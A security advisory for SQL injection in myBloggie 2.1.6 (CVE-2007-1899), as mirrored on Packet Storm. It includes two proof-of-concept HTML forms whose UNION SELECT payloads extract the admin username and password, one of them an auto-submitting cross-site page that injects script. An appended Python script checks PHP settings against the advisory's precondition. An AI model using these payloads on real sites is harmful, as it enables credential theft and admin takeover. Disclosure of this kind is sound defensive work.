
mybloggie-sql.txt

Published: 01 Jul 2008 00:00:00
Reported by: Jesper Jurcenoks
Type: packetstorm
Source: packetstormsecurity.com

myBloggie 2.1.6 SQL injection vulnerability. Allows attackers to execute SQL scripts, obtain sensitive data, or acquire admin privileges. Requires PHP magic_quotes_gpc Off and register_globals On. Vendor not responsive.

`netVigilance Security Advisory #40  
  
myBloggie version 2.1.6 Multiple SQL Injection Vulnerability  
Description:  
myBloggie (http://mywebland.com/mybloggie/) is considered one of the  
simplest and most user-friendly yet feature-packed weblog systems  
available to date. It is built using PHP & MySQL, the web's most popular  
scripting language & database system, which enables myBloggie to be  
installed on any web server.  
A security problem in the product allows attackers to commit SQL injection.  
External References:  
Mitre CVE: CVE-2007-1899   
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899  
NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899  
OSVDB:  
  
Summary:  
myBloggie is a weblog system built using PHP & MySQL, the web's most  
popular scripting language & database system, which enables myBloggie to  
be installed on any web server.  
  
Successful exploitation requires PHP magic_quotes_gpc set to Off and   
register_globals set to “On”.  
Advisory URL:  
http://www.netvigilance.com/advisory0040  
  
Release Date: June 30th 2008  
  
Severity/Risk: Medium  
  
CVSS 2.0 Metrics  
Access Vector: Network  
Access Complexity: High  
Authentication: Not-required  
Confidentiality Impact: Partial  
Integrity Impact: Partial  
Availability Impact: Partial  
CVSS 2.0 Base Score: 5.1  
  
Target Distribution on Internet: Low  
  
Exploitability: Functional Exploit  
Remediation Level: Workaround  
Report Confidence: Uncorroborated  
  
Vulnerability Impact: Attack  
Host Impact: SQL Injection.  
  
SecureScout Testcase ID: TC 17969  
  
Vulnerable Systems:  
myBloggie version 2.1.6  
  
Vulnerability Type:  
SQL injection allows malicious people to execute their own SQL scripts.   
This could be exploited to obtain sensitive data, modify database   
contents or acquire administrator’s privileges.  
  
Vendor:  
myWebland (http://mywebland.com/)  
  
Vendor Status:  
The vendor was notified on April 9th 2007 but did not respond.  
Workaround:  
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off  
  
Example:  
  
SQL Injection Vulnerability 1:  
Create an HTML file with the following content:  
<html>  
<body>  
<form   
action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser"   
method="POST">  
<input type="submit" name="user_id" value="1 #' UNION SELECT   
CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1   
FROM `mb_user` /*">  
</form>  
</body>  
</html>  
  
REQUEST:  
Browse this file and click on the button  
REPLY:  
<tr><td colspan="3" class="spacer6"></td></tr>  
<tr><td></td><td></td><td align="right">  
<span class="f10pxgrey">Category : <a class="std"   
href="?mode=viewcat&cat_id=1">  
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN   
PASSWORD]</a>  
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif"   
alt="" />  
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |  
<img src="./templates/aura/images/trackback.gif" />  
  
SQL Injection Vulnerability 2:  
  
(SQL Injection + XSS Attack Vulnerability)  
Create an HTML file with the following content and place it, for example, at  
http://somedomain.com/file.html:  
<html>  
<body onLoad="document.forms(0).submit();">  
<form action="   
http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit"   
method="POST"> <input type="hidden" name="post_id" value="-1' UNION   
SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`),   
'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7   
FROM `mb_user`#">  
</form>  
</body>  
</html>  
REQUEST:  
Induce a myBloggie admin to browse the malicious page:  
http://somedomain.com/file.html  
  
REPLY:  
Page containing username and password for Mybloggie admin account.  
  
  
Credits:  
Jesper Jurcenoks  
Co-founder netVigilance, Inc  
www.netvigilance.com  
`
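
The advisory's workaround depends on two PHP directives, so a defender needs to know their effective values, not just what php.ini says. The following is an added example (not part of the advisory or of myBloggie) that resolves both directives and reports whether the precondition the advisory names is in effect. It assumes a pre-5.4 PHP that still has both directives, PHP's built-in defaults for them, and an Apache mod_php host where `php_flag` lines in .htaccess override php.ini; the function names and sample inputs are constructed for illustration.

```python
import re

# PHP's built-in defaults for these directives (assumption: a pre-5.4 PHP,
# the releases in which both directives still exist).
DEFAULTS = {"magic_quotes_gpc": True, "register_globals": False}
TRUE_WORDS = {"1", "on", "true", "yes"}  # anything else is treated as Off

# php.ini assignment; lines starting with ';' are comments and never match.
INI_LINE = re.compile(r"^\s*(magic_quotes_gpc|register_globals)\s*=\s*([^;]*)", re.I)
# Apache per-directory override under mod_php: php_flag <name> on|off
FLAG_LINE = re.compile(r"^\s*php_flag\s+(magic_quotes_gpc|register_globals)\s+(\S+)", re.I)


def _as_bool(raw):
    return raw.strip().strip("\"'").lower() in TRUE_WORDS


def effective_settings(php_ini_text, htaccess_text=""):
    """Resolve both directives: defaults, then php.ini, then php_flag overrides."""
    settings = dict(DEFAULTS)
    for pattern, text in ((INI_LINE, php_ini_text), (FLAG_LINE, htaccess_text)):
        for line in text.splitlines():
            match = pattern.match(line)
            if match:  # a later assignment replaces an earlier one
                settings[match.group(1).lower()] = _as_bool(match.group(2))
    return settings


def meets_advisory_precondition(settings):
    """True when magic_quotes_gpc is Off and register_globals is On."""
    return (not settings["magic_quotes_gpc"]) and settings["register_globals"]


# Constructed sample inputs (not taken from any real host).
SAMPLE_INI = """\
[PHP]
; register_globals = On
magic_quotes_gpc = On
register_globals = Off
"""
SAMPLE_HTACCESS = """\
# legacy blog needs these
php_flag register_globals on
php_flag magic_quotes_gpc off
"""

if __name__ == "__main__":
    for label, ht in (("php.ini only", ""), ("with .htaccess", SAMPLE_HTACCESS)):
        s = effective_settings(SAMPLE_INI, ht)
        print(label, s, "EXPOSED" if meets_advisory_precondition(s) else "ok")
```

The second sample shows the case a php.ini-only review misses: the global file applies the workaround, but a per-directory override restores the exposed configuration.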
